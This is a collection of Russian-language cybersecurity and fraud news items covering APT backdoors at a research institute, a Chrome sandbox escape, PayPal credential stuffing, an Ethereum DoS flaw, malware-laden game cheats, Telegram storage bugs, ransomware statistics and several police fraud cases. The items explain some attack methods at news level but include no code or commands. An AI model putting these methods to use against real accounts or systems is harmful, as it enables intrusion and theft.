«"Ростелеком" запустил технический тест, публичный тест для хакеров, для всех желающих. Тестовое голосование, в ходе которого можно будет получить доступ к тестовым бюллетеням, авторизованной и анонимной зоне портала голосования vybory.gov.ru, пройдет с 10:00 до 18:00 4 сентября, а также после технологического перерыва с 20:00 4 сентября до 22:00 5 сентября.
Со всех желающих найти уязвимость в системе снимается ответственность. Более того, для нашедших такую уязвимость предусмотрен призовой фонд, который составит два миллиона рублей
Ранее президент России Владимир Путин подписал указ о назначении выборов в Госдуму РФ восьмого созыва на единый день голосования 19 сентября. Голосование пройдёт в течение трёх дней.
Осенью 2020 года за помощью к специалистам «Доктор Веб» обратился неназванный российский научно-исследовательский институт. Сотрудники НИИ обратили внимание на ряд технических проблем, которые могли свидетельствовать о присутствии малвари на одном из серверов в локальной сети.
В ходе расследования эксперты компании установили, что на НИИ была осуществлена целевая атака с использованием специализированных бэкдоров. Хуже того, изучение деталей инцидента показало, что сеть предприятия была скомпрометирована давно и, судя по всему, не одной APT-группой.
Исследователи пишут, что первая хакерская группа скомпрометировала внутреннюю сеть института еще осенью 2017 года. Первичное заражение осуществлялось с помощью BackDoor.Farfli.130 — модификации бэкдора, также известного как Gh0st RAT. Позднее, весной 2019 года в сети НИИ был установлен Trojan.Mirage.12, а в июне 2020 — BackDoor.Siggen2.3268.
Вторая хакерская группа скомпрометировала сеть института не позднее апреля 2019, и в этот раз заражение началось с установки бэкдора BackDoor.Skeye.1. К тому же исследователи выяснили, что примерно в то же время — в мае 2019 года — Skeye был внедрен в сеть другого российского НИИ.
В июне 2019 года компания FireEye опубликовала отчет о целевой атаке на государственный сектор ряда стран центральной Азии с использованием того же бэкдора. Позднее, в период с августа по сентябрь 2020 года вирусные аналитики «Доктор Веб» зафиксировали установку различных троянов этой группой в сети предприятия, включая ранее не встречавшийся DNS-бэкдор BackDoor.DNSep.1, а также хорошо известный BackDoor.PlugX.
Более того, в декабре 2017 года на серверы обратившегося к экспертам НИИ был установлен BackDoor.RemShell.24. Представители этого семейства малвари ранее были описаны специалистами Positive Technologies в исследовании Operation Taskmasters. Аналитики пишут, что располагают данными, которые позволили бы однозначно определить, какая из двух APT-групп использовала этот бэкдор.

Деятельность первой APT-группы не позволила экспертам однозначно идентифицировать ее как одну из ранее описанных хакерских группировок. При этом анализ используемых вредоносных программ и инфраструктуры показал, что эта группировка активна как минимум с 2015 года.
Второй APT-группой, атаковавшей НИИ, по мнению «Доктор Веб», была TA428, ранее описанная исследователями компании Proofpoint в материале Operation Lag Time IT. В пользу этого вывода приводятся следующие факты:
На иллюстрациях ниже приведена часть задействованной в атаке инфраструктуры с пересечениями бэкдоров Skeye и другим известным APT-бэкдором — PoisonIvy, а также изображены пересечения в инфраструктуре бэкдоров Skeye и Cotx.


Индикаторы компрометации доступны на GitHub компании, тогда как сравнительный анализ кода обнаруженных бэкдоров и технические описания малвари можно найти по ссылкам приведенным выше.
Источник: xakep.ru/2021/04/06/nii-attacks/
Эксперты из китайской компании Qihoo 360, Гуан Гон (Guang Gong) и Ликрасо (Leecraso), обнаружили уязвимость в браузере Chrome, которая позволяла выйти за пределы песочницы. В итоге выпущенное на этой неделе обновление Chrome до версии 89 содержит восемь исправлений безопасности, в том числе для шести уязвимостей, о которых сообщили сторонние исследователи.
За свою находку аналитики Qihoo 360 удостоились наивысшей награды по программе bug bounty: 20 000 долларов США. Найденная уязвимость получила идентификатор CVE-2021-21194, и эксперты описывают ее как use-after-free, связанную с захватом экрана.
Этот баг позволял выйти за пределы песочницы Chrome, а его эксплуатация становилась возможной в сочетании с другой проблемой, связанной с рендерингом, после чего удаленный атакующий мог осуществить побег из песочницы и выполнить произвольный код.
Специалисты Qihoo 360 далеко не впервые обнаруживают подобные проблемы в Chrome. Только за последний год они получили более 150 000 долларов в рамках bug bounty за различные баги в браузере Google, а их имена упоминаются как минимум в 17 бюллетенях безопасности.
Отмечу, что последнее обновление Chrome принесло исправления и для других багов, включая несколько уязвимостей с высокой степенью серьезности: use- after-free в JavaScript-движке V8, два переполнения хипа в TabStrip, проблему out-of-bounds чтения за в IPC, и ошибку use-after-free в Ауре.
Источник: xakep.ru/2021/04/02/chrome-sandbox-escape-2/
Министерство юстиции США предъявило обвинения шести людям в мошенничестве на миллионы долларов, связанном с тендерами на поставку ИТ-продуктов и услуг для госструктур. Среди пострадавших — Министерство обороны и некоторые разведывательные службы.
Первая группа обвиняемых, которую возглавляет Виктор Маркес из штата Мэриленд, якобы использовала инсайдерскую информацию, чтобы выигрывать тендеры на неконкурентных условиях. Это позволило компании Маркеса подавать заявки с заранее определёнными, искусственно заниженными ценами, что гарантировало победу. Маркесу предъявлены обвинения в мошенничестве и заговоре, и он может получить до 70 лет тюремного заключения. Его сообщники также обвиняются в аналогичных преступлениях.
Во второй группе главным обвиняемым стал Брил Л. Мэдисон-младший, который на протяжении нескольких лет через фиктивные компании продавал своему работодателю и госструктурам ИТ-продукты на общую сумму более $9 миллионов. Считается, что часть полученных денег Мэдисон потратил на покупку яхты и Lamborghini Huracan. Если вина будет доказана, власти намерены конфисковать эти активы. Мэдисону-младшему предъявлены обвинения в сговоре, взяточничестве и отмывании денег, и он может провести до 185 лет в тюрьме.
justice[.]gov/opa/pr/six-charged-scheme-defraud-federal-government
justice[.]gov/opa/media/1375336/dl
justice[.]gov/opa/media/1375331/dl
Следственным подразделением отдела полиции Центрального района УВД по городу Сочи завершено расследование уголовного дела, возбужденного в отношении 21-летнего местного жителя по признакам преступлений, предусмотренных статьями 158 и 159 УК РФ.
По данным следствия, обвиняемый в период с августа 2021 года по октябрь 2022 года под предлогом дополнительного заработка на валютной и криптовалютной биржах убеждал граждан вкладывать денежные средства в инвестиции. При этом взятые на себя обязательства по выплате процентов и возврате основной депозитной суммы обвиняемый выполнять не планировал, деньгами потерпевших распоряжался по своему усмотрению. В результате противоправной деятельности злоумышленника 17 гражданам причинен материальный ущерб на общую сумму свыше 34 млн рублей.
В настоящее время материалы уголовного дела с утвержденным обвинительным заключением направлены в суд для рассмотрения по существу. Санкции инкриминируемых статей предусматривают максимальное наказание в виде лишения свободы на срок до десяти лет.
Киберполиция Харьковщины разоблачила злоумышленников, которые рассылали фишинговые ссылки на торговых онлайн-площадках и присваивали деньги со счетов граждан. Обвинительный акт в отношении пяти членов группировки направлен в суд. Фигурантам грозит до двенадцати лет лишения свободы.
Участников преступной группировки разоблачили сотрудники управления противодействия киберпреступлениям в Харьковской области совместно со следственным управлением области под процессуальным руководством Харьковской областной прокуратуры, при содействии работников служб безопасности АО «Универсал Банк», «ПриватБанк» и «Ощадбанк».
Организовал противоправную деятельность 23-летний житель Харькова, который привлек к ней еще пятерых сообщников. Для реализации мошеннической схемы фигурант создал сайт и Telegram-канал, где предоставлял другим членам преступной группы указания и фишинговые ссылки.
В дальнейшем злоумышленники под предлогом покупки товаров связывались с продавцами на популярных онлайн-платформах. Фигуранты присылали пострадавшим фишинговые ссылки якобы для оформления услуги доставки. С помощью таких ссылок члены группировки получали данные банковских карт граждан и завладевали их средствами.
В дальнейшем полученные средства правонарушители «выводили» на подконтрольные счета с помощью платежных систем, а также тратили на покупку криптовалюты на зарубежных биржах.
По результатам расследования полицейскими доказано 16 эпизодов преступной деятельности фигурантов.
Шестерым участникам преступной группировки объявлено подозрение в совершении преступления по ч. 4 ст. 190 (Мошенничество) в редакции Уголовного кодекса Украины, действующей до 11.08.2023. Злоумышленникам избраны меры пресечения в виде залога и домашнего ареста. Один из обвиняемых объявлен в розыск. Фигурантам грозит до двенадцати лет лишения свободы.
Алибек Басиев получил сообщение якобы от руководителя казначейства.
Начальник предупредил мужчину, что скоро ему поступит важный звонок. После этого с Басиевым связался некий куратор из Минфина. Мужчина сообщил, что ФСБ расследует дело о масштабном мошенничестве среди сотрудников казначейства.
Далее на Басиева вышли уже «сотрудники ЦБ» и убедили перевести на их счет накопления, взять кредиты и заложить автомобиль. Как только мошенники получили порядка 12 миллионов, они стали разводить его жену — сотрудницу Минфина. Ей звонили из якобы ФСБ, на ее сомнения муж сказал, что собеседникам можно доверять. Женщина заподозрила неладное только после третьего кредита.
В июне 2023 года консорциум W3C [анонсировал](https://www.w3.org/press- releases/2023/spc-cr/) новый стандарт для подтверждения финансовых операций [Secure Payment Confirmation](https://www.w3.org/TR/secure-payment- confirmation/) (SPC), который в случае принятия упростит платежи в интернете. Пока стандарт опубликован в качестве рекомендации-кандидата (Candidate Recommendation).
SPC делает стандартом для финансовых транзакций браузерную криптографию Web Authentication (WebAuthn). Это платежи по отпечатку пальца/скану лица/пинкоду и т. д. Теперь вместо кода или SMS для подтверждения транзакции 2FA можно предъявлять отпечаток пальца.
Новый стандарт должен упростить аутентификацию пользователей, обеспечить строгую аутентификацию клиента (SCA) и получение криптографического доказательства согласия. Наличие криптографического доказательства — важный аспект нормативных требований и регуляций в разных странах, в том числе [Директивы о платёжных услугах](https://www.ecb.europa.eu/paym/intro/mip- online/2018/html/1803_revisedpsd.en.html) (PSD2) в Европе.
В целом SPC полагается на технологию WebAuthn и работает примерно по такому же механизму, как представленный недавно стандарт беспарольной аутентификации [Google Passkeys](https://security.googleblog.com/2023/05/so-long-passwords- thanks-for-all-phish.html) (ключи доступа), который позволяет войти в аккаунт [без пароля](https://blog.google/technology/safety-security/the-beginning-of- the-end-of-the-password/), а по пальцу, лицу, локальному пинкоду или аппаратному ключу. То есть авторизоваться в тем же методом, каким пользователь авторизуется в операционной системе. Это считается достаточным криптографическим доказательством согласия и для аутентификации на удалённом сервере, и для платежа.
Неудивительно, что Google является одним из разработчиков технологии SPC.
Как мы упоминали в недавней статье про Passkeys, сканирование отпечатка пальца — это самый простой и безопасный метод аутентификации, согласно опросам пользователей:
Сканер отпечатка пальца и/или лица присутствует в большинстве современных смартфонов.
Принятие SPC в качестве рекомендации-кандидата указывает на то, что набор функций «является стабильным и получил широкое рассмотрение», сказано в пресс- релизе W3C. Теперь консорциум должен получить дополнительные примеры экспериментального внедрения SPC, прежде чем внести окончательные правки и принять финальную версию стандарта.
W3C отмечает актуальность нового стандарта в связи с широким распространением электронной коммерции и усилением требований к защите платежей. Если в 90-е годы для платежа было достаточно ввести номер кредитной карты в форму с POST- запросом, то сейчас это редкость. Более того, в Европе и других странах такой метод запретили законодательно, введя обязательную многофакторную аутентификацию для некоторых видов платежей. Вот здесь и возникает проблема.
Хотя многофакторная аутентификация снижает уровень мошенничества, она затрудняет процедуру платежа и увеличивает количество отказов от совершения сделки (например, см. результаты эксперимента Microsoft по использованию SCA в рамках PSD2):

В 2019 году рабочая группа W3C по веб- платежам начала работу над безопасным стандартом подтверждением платежа, который обеспечит строгую аутентификацию клиента (SCA), но будет проще в использовании. Компания Stripe осуществила пилотный проект SPC и в марте 2020 года. В эксперименте Stripe после обычной транзакции пользователю предлагается проводить будущие платежи по отпечатку пальца:

Затем браузер проверяет соответствующие криптографические примитивы:
На этом процедура завершена:

В следующий раз после ввода данных карты браузер предлагает подтвердить перевод отпечатком пальца:
После проверки в браузере платёж завершается.
По сравнению с одноразовыми паролями (OTP) аутентификация SPC увеличила конверсию на 8% и ускорила процедуру аутентификации втрое: с 36 до 12 секунд.
SPC разработан при участии группы по созданию спецификаций для безопасности платежей Web Payment Security Interest Group, куда входят W3C, FIDO Alliance и EMVCo. В результате новый стандарт совместим с актуальными протоколами двухфакторной аутентификации EMV 3-D Secure (версия 2.3) и EMV Secure Remote Commerce (версия 1.3).
Поддержка технологии SPC требует внесения изменений в браузеры для реализации WebAuthn. В настоящее время она доступна в браузерах Chrome и Edge на платформах macOS, Windows и Android. Рабочая группа W3C по веб-платежам будет способствовать внедрению этой технологии в других браузерах.
Сейчас W3C наблюдает за проведением других пилотных программ, включая второй
эксперимент Stripe. Результаты ожидают к сентябрю 2023 г. После этого возможна
окончательная стандартизация.
Предполагается, что платежи по SPC станут удобнее для всех. Для пользователей это более простой способ оплаты, а для мерчантов — увеличение конверсии.
В американском Лас-Вегасе (штат Невада) зафиксированы отдельные случаи краж средств у студентов, на счетах которых хранятся деньги на обучение, выданные им в кредит. Об одном из таких случаев рассказал местный телеканал 8 News, журналисты которого смогли пообщаться с жертвой мошенников.
Что любопытно, студентка местного вуза Кэти Хоффман (Katie Hoffman) стала, судя по всему жертвой массовой рассылки в ходе фишинговой кампании. В феврале 2023 года она получила сообщение, отправленное от имени ее банка Chase. В нем утверждалось, что она может стать жертвой мошенников, и чтобы детально знать способы защиты от них, ей необходимо кликнуть по ссылке.
После перехода ей практически моментально перезвонили с номера, который совпадал с телефоном Chase на обороте ее карточки. Собеседник задал несколько вопросов, в том числе уточнив имена ближайших членов семьи Хоффман. После этого он распрощался, отметив, что банк свяжется со студенткой на следующий день. Новый разговор в итоге не состоялся, зато сама девушка заметила, что с ее счета пропали 7,5 тысячи долларов.
Попытки вернуть средства с помощью полиции и сотрудников банка не увенчались успехом. В Chase Хоффман и вовсе заявили, что она санкционировала совершенный перевод, а со стороны банка при этом ошибок не было. Расследование же дела местной полицией, судя по всему, зашло в тупик.
source: 8newsnow.com/news/local-news/unlv-student-claims-scammers-stole- federal-loan/
ФСБ выписала жителю Владимирской области предостережение о недопустимости нарушения закона, касающегося несанкционированного доступа к компьютерной информации. Хакер пытался сделать это дважды даже после обыска и изъятия техники.
Сотрудники управления ФСБ по Владимирской разоблачили 34-летнего жителя города Владимира в приготовлении к совершению преступления (ч.1 ст.273 УК РФ).
Речь идёт о «создании, распространении или использовании компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации».
Наказание предполагает вплоть до 4 лет лишения свободы со штрафом в 200 тысяч рублей. Но хакеру не удалось довести замысел до конца по независящим от него обстоятельствам.
По версии следствия, гражданин, увлекающийся компьютерными технологиями, в январе 2023 года начал активно интересоваться проведением компьютерных атак на информационные ресурсы исполнительного органа государственной власти субъекта РФ (какого — не уточняется). Хакер намеревался получить несанкционированный доступ к базе данных с целью незаконного копирования и нейтрализации средств защиты компьютерной информации.
Мужчина установил компьютерную программу, предназначенную для нейтрализации средств защиты компьютерной информации. Пресс-служба УФСБ по Владимирской области сообщает, что «свой мотив фигурант объяснил желанием получить знания о методах и средствах совершения компьютерных атак, с целью определения уровня защищенности различных интернет-ресурсов».
После проведения сотрудниками ФСБ в отношении гражданина активных гласных оперативно-розыскных мероприятий (это когда сотрудники не «шифруются» и не используют, например, перлюстрацию почтовых отправлений или прослушку телефонных переговоров) и изъятия у него техники, владимирец подумал, что это всё шутки, и начал поиски нового оборудования, чтобы, по мере получения необходимых навыков, довершить задуманное.
Другими словами, он намеренно готовился к совершению преступления, которое не состоялось по независящим от него причинам. Учитывая, что преступление относится к средней тяжести, уголовная ответственность не наступает. Если бы гражданин замышлял покушение на убийство или иное тяжкое или особо тяжкое преступление, то его однозначно отправили бы в колонию.
В мае 2023 года в целях предупреждения совершения преступления жителю
Владимира объявлено официальное предостережение о недопустимости действий,
создающих условия для совершения преступления, связанного с
несанкционированным доступом к компьютерной информации. Если житель города
Владимира не осознает, что государство к нему проявило милосердие, и пойдёт на
третий заход, то с ним будут разговаривать по-другому.
• Source: [https://zebra-tv.ru/novosti/jizn/na...-vzlomu-bazy-dannykh-
gosudarstvennogo-organa/](https://zebra-tv.ru/novosti/jizn/nastoychivyy-
khaker-dvazhdy-popalsya-na-podgotovke-k-vzlomu-bazy-dannykh-gosudarstvennogo-
organa/)
Масштабная утечка, как ни странно, произошла не по вине сервиса.
PayPal массово рассылает уведомления об утечке данных. По результатам хакерской атаки личные данные множества пользователей попали в руки злоумышленников.
PayPal заявляет, что атака произошла в период с 6 по 8 декабря 2022 года. Компания быстро обнаружила её и приняла соответствующие меры, но также начала внутреннее расследование, чтобы выяснить, как хакеры получили доступ к учетным записям.
20 декабря PayPal завершила расследование и подтвердила, что неавторизованные третьи лица действительно входили в скомпрометированные учетные записи, но случилось это совсем не из-за уязвимости платформы PayPal.
Ответственная за взлом группировка применила метод Credential stuffing - это
метод кражи данных, который используется злоумышленниками для доступа к
учетным записям в Интернете. Он основан на использовании баз данных учетных
записей, которые были слиты в сеть в результате более ранних утечек данных.
Методом автоматического перебора специальный софт проходится по базе и находит
нужную комбинацию логин/пароль.
при котором специальное программное обеспечение просто перебирает комбинации
учётных данных, полученных злоумышленниками в ходе предыдущих утечек. Иначе
говоря, логины/пароли могли слить совсем из другого сервиса и очень давно, но
успешно применить их для авторизации в учётные записи PayPal. Похитить личную
информацию удалось только с тех аккаунтов, которые не были защищены
двухфакторной аутентификацией.
Согласно отчёту компании, инцидент затронул около 35 тысяч пользователей. В течение двух дней хакеры имели доступ к следующим данным пользователей сервиса: ФИО, дата рождения, почтовый адрес, номер социального страхования, индивидуальный идентификационный номер налогоплательщика, история транзакций, данные подключенных карт и данные выставления счетов PayPal.
Компания заявляет, что предприняла своевременные действия, чтобы ограничить доступ злоумышленников к платформе и сбросить пароли учетных записей, которые были взломаны. Также в сообщении компании утверждается, что злоумышленники не пытались или не смогли провести какие-либо транзакции со взломанных учетных записей PayPal.
«У нас нет информации, позволяющей предположить, что какие-либо ваши личные данные были использованы не по назначению в результате этого инцидента, или что в вашей учетной записи были проведены какие-либо несанкционированные транзакции», — сообщается в сообщении PayPal пострадавшим пользователям.
«Мы сбросили пароли уязвимых учетных записей PayPal и внедрили расширенные средства контроля безопасности, которые потребуют от вас установки нового пароля при следующем входе в свою учетную запись», — предупредила компания.
PayPal также настоятельно рекомендовала пользователям, получившим уведомление о взломе, активировать двухфакторную аутентификацию (Двухфакторная аутентификация (2FA) - это способ проверки личности пользователя с использованием двух различных этапов аутентификации, которые обеспечивают "двухслойную" защиту аккаунта от несанкционированного доступа. На первом этапе, как правило, запрашивается стандартная связка логин/пароль. На втором этапе, чаще всего, короткий код, полученный по SMS или электронной почте. Иногда на втором этапе используется USB-токен или биометрические данные человека.Двухфакторная аутентификация надёжно защищает аккаунты в интернете от большинства уязвимостей.
в меню «Настройки учетной записи». Это может предотвратить доступ злоумышленников, даже если они обладают всеми данными для входа в аккаунт. Ещё компания порекомендовала изменить пароли и от других онлайн-аккаунтов, чтобы ситуация не повторилась с ними.
1 февраля полиция Израиля опубликовала официальное заявление, где признала: в слежке за гражданами с помощью шпионской программы Pegasus были допущены некоторые отступления от правил. «Экспертиза выявила дополнительные факты, меняющие положение дел в некоторых аспектах», - говорится в заявлении полиции.
Ранее, 20 января, полиция заявляля, что в применении шпионского ПО компании NSO никаких нарушений не было. Использование системы было совершенно законным
Теперь в полиции утверждают, что при повторной проверке выявили новые факты.
«Полиция Израиля провела проверку случаев, в которых утверждалось, что ее действия выходили за рамки ее полномочий, при прослушивании телефонных разговоров с помощью технических средств, позволяющих принимать сообщения между компьютерами. После первоначальной проверки мы направили свои выводы юридическому советнику правительства. На основании этого было сделано заявление 20 января», - говорится в заявлении полиции.
Юридический соверник правительства Авихай Мандельблит, срок полномочий которого заканчивается сегодня, назначил следственную группу по делу NSO, и распорядился представить выводы к началу июля.
В полиции добавили, что будут в полной мере сотрудничать со следственной группой, созданной по этому вопросу: «Начальник отдела расследований и разведки, согласованно с начальником полиции Израиля, проинструктирует всех сотрудников сотрудничать с представителями следственной группы, предоставлять информацию и документы, отвечать на вопросы, позволить доступ к информационным системам и предоставлять техническую информацию о средствах, используемых израильской полицией, включая информацию, находящуюся в распоряжении третьих лиц».
Во время дискуссии по этому вопросу, состоявшейся сегодня на заседании законодательной комиссии кнессета, бригадный генерал полиции Йоав Телем прокомментировал факт изменения версии полиции: «Пока мы не обнаружили ни одного прослушивания, которое не было бы проведено в соответствии с законом. Мы не выявили признаков нелегальных действий со стороны кого бы то ни было в полиции. При проведении повторных проверок в прошлом мы выявляли отступления от правил. Если это будет касаться тайной прослушки — мы первые, кто желает знать об их наличии. Я не собираюсь уклоняться от ответственности, но не хочу и нанести ненужный вред».
Во вторник, 1 февраля, в последний день пребывания в должности юридического советника Авихай Мандельблит объявил о создании комиссии, которая проверит использование полицией программного обеспечения компании NSO.
Следственная группа должна представить свои выводы до 1 июля 2022 года.
Группу возглавит заместитель юридического советника правительства адвокат Амит Марари. Входить в комиссию будут бывший начальник технологического отдела ШАБАКа адвокат Цафрир Кац и бывший начальника следственного отдела ШАБАКа адвокат Эяль Даган.
Сразу после сообщения о создании комиссии полиция Израиля впервые признала, что сообщения об использовании полицией программы Pegasus не беспочвенны.
Напомним, первым о якобы незаконном использовании полицией Израиля программного обеспечения компании NSO без разрешения суда сообщил журналист издания "Калькалист" Томер Ганон.
Журналист Томер Ганон писал, что, среди прочего, программы NSO, обеспечивающие доступ ко всей хранящейся в мобильном телефоне информации, были внедрены в телефоны лидеров протестного движения "Черные флаги". Еще до этого были взломаны телефоны лидеров протестов против парадов гордости.
Также, по данным Ганона, полиция платила хакерам за взлом частных сетей WiFi, камер наблюдения, мобильных телефонов, которые не удалось взломать сотрудникам полиции. Таким образом, хакеры - самые обычные граждане, не являющиеся сотрудниками полиции, не проходившие соответствующую подготовку, получали доступ к личной информации других граждан.
Разработчики Ethereum Foundation раскрыли информацию об уязвимости, позволяющей провести DoS-атаку на блокчейн второй по капитализации криптовалюты.
A disclosure about the #Ethereum state problems, which we’ve been working on fixing for the past two years: https://t.co/GQBh0rFYKf
— M H (((Swende))) (@mhswende) May 18, 2021Click to expand...
Уязвимость обнаружили еще в марте 2019 года, но устранить ее удалось лишь с активацией хардфорка Berlin в апреле 2021 года.
По словам разработчиков, уязвимость была «общеизвестным секретом» — ранее ее публично раскрыли по ошибке. После апрельского обновления уровень угрозы снизился достаточно, чтобы рассказать о ней детально.
«Важно, чтобы сообщество могло понять причины изменений, негативно влияющих на пользовательский опыт, таких как повышение стоимости газа», — говорится в сообщении.
Разработчики объяснили, что состояние Ethereum фиксируется с помощью дерева хешей [Merkle Patricia Tree]. Каждый «лист» этого дерева — аккаунт в сети, поэтому с ростом блокчейна структура становится более плотной.
Между корневым хешем и счетами пользователей есть несколько «промежуточных» нод. Для обращения к конкретному адресу системе необходимо выполнить 8-9 операций.
Низкая стоимость этих транзакций и развитие сети создали риски DoS-атаки. Для ее реализации достаточно запустить поиск по несуществующим адресам.
Для решения этой проблемы разработчики изменили алгоритм расчета стоимости газа и интегрировали в клиент Geth механизм динамических снимков состояния [dynamic state snapshots]. Такие снимки представляют собой вторичную структуру данных для хранения состояния сети в формате плоских файлов.
С активацией Berlin эффективность атаки упала в 50 раз.
На этой неделе эксперты Cisco Talos предупредили о том, что читы и моды для популярных игр, как правило, содержат малварь и представляют опасность для игроков. По словам исследователей, они обнаружили ряд новых кампаний, нацеленных на геймеров (о каких именно играх идет речь, не уточняется).
Чаще всего злоумышленники используют для распространения и рекламы своих вредоносных игровых инструментов социальные сети и обучающие ролики на YouTube, посвященные моддингу. Как правило таким способом рекламируются небольшие решения, вроде игровых патчей, твиков или модов, за которыми на самом деле скрывается малварь.
В частности, таким способом распространяется малварь XtremeRAT (ExtRat) — троян удаленного доступа (RAT), используемый в целевых атаках как минимум с 2010 года. XtremeRAT позволяет своим операторам извлекать документы из взломанных систем, перехватывать нажатия клавиш, делать снимки экрана, записывать звук и видео с помощью веб-камер и микрофонов, напрямую взаимодействовать с жертвами и многое другое.
Эксперты отмечают, что в этой кампании злоумышленники используют сложный криптор на базе VisualBasic и шелл-код, чтобы затруднить анализ и обнаружение, а также скрыть конечную полезную нагрузку. Кроме того, дроперы, проникшие на машины геймеров, используют инъекции процессов для внедрения малвари во вновь созданные процессы. Это тоже затрудняет обнаружение и позволяет вредоносному ПО скрыть окончательную полезную нагрузку от некоторых средств защиты.
«Так как тенденция к работе на дому вряд ли закончится в ближайшее время, и наблюдается рост использования личных ПК для подключения к корпоративным сетям, — это серьезная угроза для корпоративных сетей, — предупреждают в Cisco Talos. — Порой сотрудники загружают инструменты для моддинга или читы из сомнительных источников на ту же машину, которую используют в работе».
Click to expand...
Практически одновременно с Cisco похожее предупреждение опубликовал и игровой гигант Activision. Исследование игровых разработчиков подробно описывает, как преступники скрывают вредоносные программы внутри читов для Call of Duty: Warzone.
Разработчики Activision знакомят пользователей с пошаговым сценарием того, как появляются читы на примере дропера Cod Dropper v0.1: начиная от руководства по распространению малвари с хакерских форумов, и заканчивая разработкой самого вредоносного читерского ПО и последующей рекламы на игровых форумах и YouTube для его распространения.



В сущности, Activision предостерегает пользователей от установки любого читерского ПО, даже если в составе конкретного инструмента пока не обнаруживали малварь. Дело в том, что установка сомнительных читов и модов все равно может сделать пользователей уязвимыми для различных атак в будущем.
«Для работы “настоящих” читов требуется такая же зависимость, как и для успешного выполнения большинства вредоносных программ. Защита системы должна быть обойдена или отключена, а привилегии должны быть повышены, чтобы программа могла работать правильно и/или сохранять устойчивое присутствие в системе. В конечном итоге, это лишь метод социальной инженерии, который эксплуатирует готовность жертв (игроков, которые хотят читерить) добровольно снизить свою защиту и игнорировать предупреждения о запуске потенциально вредоносного ПО».
Click to expand...
Интересно, что предупреждение Activision было выпущено после того, как производитель объявил читерам в CoD настоящую войну. Так, в сентябре 2020 года компания забанила 20 000 игроков Warzone за читерство, а в феврале текущего года забанила еще 60 000.
Источник: xakep.ru/2021/04/02/cheats-warning/
Разработчики Telegram исправили баг, из-за которого самоуничтожающиеся аудио- и видеофайлы не удалялись с устройств под управлением macOS.
Напомню, что в режиме секретного чата нельзя пересылать сообщения другим пользователям, а также есть возможность настроить автоматическое самоуничтожение всех сообщений и мультимедиа по прошествии определенного количества времени.
Независимый ИБ-специалист Дхирадж Мишра (Dhiraj Mishra) обнаружил, что в Telegram версии 7.3 самоуничтожающиеся сообщения не удалялись с устройства получателя окончательно. Так, эксперт заметил, что на macOS стандартные чаты «сливают» путь песочницы, где хранятся все полученные видео- и аудиофайлы. И хотя этот путь не «утекает» в секретных чатах, полученные медиафайлы все равно хранятся там же, даже если в самом чате сообщения уже самоуничтожились, как и должны были.
«Боб (злоумышленник, использующий tdesktop macOS) и Алиса (жертва) общаются в режиме секретного чата, и Алиса отправляет аудио/видео сообщение Бобу с таймером самоуничтожения на 20 секунд. Хотя сообщение удаляется из чата через 20 секунд, оно по-прежнему доступно по кастомному пути Боба, здесь Telegram не может предотвратить конфиденциальность для Алисы. В общем, функция самоуничтожения и работы без следов не работает», — пишет эксперт.
Click to expand...
Кроме того, Мишра обнаружил, что Telegram хранил локальные коды доступа для разблокировки приложения в формате обычного текста. Они сохранялись в папке Users/[имя пользователя]/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata в виде файлов JSON.
Обе проблемы исследователь обнаружил в конце декабря 2020 года, и с релизом Telegram 7.4 они были исправлены. За сообщение об обеих ошибках Мишра получил вознаграждение в размере 3000 долларов.
Источник: xakep.ru/2021/02/15/telegram-bugs/
В 2023 году жертвы группировок-вымогателей заплатили в качестве выкупа 1,1 миллиарда долларов, что стало рекордным показателем за всю историю наблюдений. Об этом свидетельствуют данные аналитиков Chainalysis, которые назвали прошедшие 12 месяцев переломными для индустрии, переживавшей спад годом ранее. Они также отметили растущее влияние рансомварщиков на глобальные институты и безопасность в целом.
«В 2023 году злоумышленники активизировали свою деятельность, нацеливаясь на крупные учреждения и критически важную инфраструктуру, включая больницы, школы и правительственные учреждения. Крупные атаки на цепочки поставок были осуществлены с использованием дыр в повсеместно распространенном программном обеспечения, вроде ПО для передачи файлов MOVEit, затронув самые разные компании»
Click to expand...
Хотя в 2022 году объем платежей рансомварщикам снизился, составив 567 миллионов долларов, общий тренд с 2019-го по 2023 год указывает на то, что программы-вымогатели становятся все более серьезной проблемой. При этом в указанные в отчете цифры не включены экономические последствия атак, в том числе связанные с потерями производительности и затратами на ремонт. Исследователи отмечают, что показатель в 1,1 миллиарда долларов в будущем может быть пересмотрен в сторону увеличения, так как среда программ- вымогателей не только обширна, но и постоянно расширяется, что усложняет отслеживание каждого инцидента и каждого выкупа.
Аналитики составили несколько графиков и диаграмм, которые позволяют детально рассмотреть имеющиеся существенные различия в стратегиях основных штаммов программ-вымогателей, зависимость среднего размера выкупа для каждого штамма в зависимости от частоты атак, а также изучить значительное количество новых игроков, привлеченных возможностью получения высокой прибыли и более низкими барьерами для входа.
Например, Cl0p является примером стратегии «охоты на крупную дичь». Группировка осуществляет меньше атак, чем многие их коллеги, но получают большие выплаты при каждой из них. В целом, такая тактика стала доминирующей в последние несколько лет, при этом все большую и большую долю в общем объеме платежей рансомварщикам составляют выплаты на сумму от миллиона долларов и выше.
Еще один принципиальный тренд — распространение модели RaaS и повышение доступности хакерских инструментов, что упростило запуск атак. На это косвенно повлиял и рост количества брокеров первичного доступа, которые проникают в сети потенциальных жертв, а затем продают этот доступ вымогателям всего за несколько сотен долларов.
«Злоумышленники продолжают внедрять инновации и адаптироваться к нормативным изменениям и действиям правоохранительных органов, — констатировали в Chainalysis. — Но в 2023 году также были отмечены значительные победы в борьбе с рансомварщиками, ставшие возможными благодаря сотрудничеству между международными правоохранительными органами, пострадавшими организациями и ИБ-компаниями»
Click to expand...
sc: chainalysis.com/blog/ransomware-2024
Фигуранты в соцсетях продавали поддельные водительские удостоверения, технические паспорта на автотранспорт и документы, необходимые для растаможки. Правоохранители направили обвинительный акт в суд. Фигурантам грозит до двенадцати лет лишения свободы.
Установлено, что организовал противоправную деятельность 44-летний житель Кировоградской области, отбывавший на то время наказание в месте лишения свободы за совершение другого преступления. К преступной деятельности он привлек свою жену и четырех исполнителей.
Предложения по изготовлению поддельных документов дельцы публиковали через анонимные аккаунты в соцсетях Instagram и Facebook. Организатор принимал заказ и вместе с женой распределял задачи между исполнителями, которые изготовляли «документы» и отправляли их заказчикам по почте. Стоимость одного удостоверения составляла 7 тысяч гривен. Оплату от клиентов получали на банковские карты так называемых дропов.
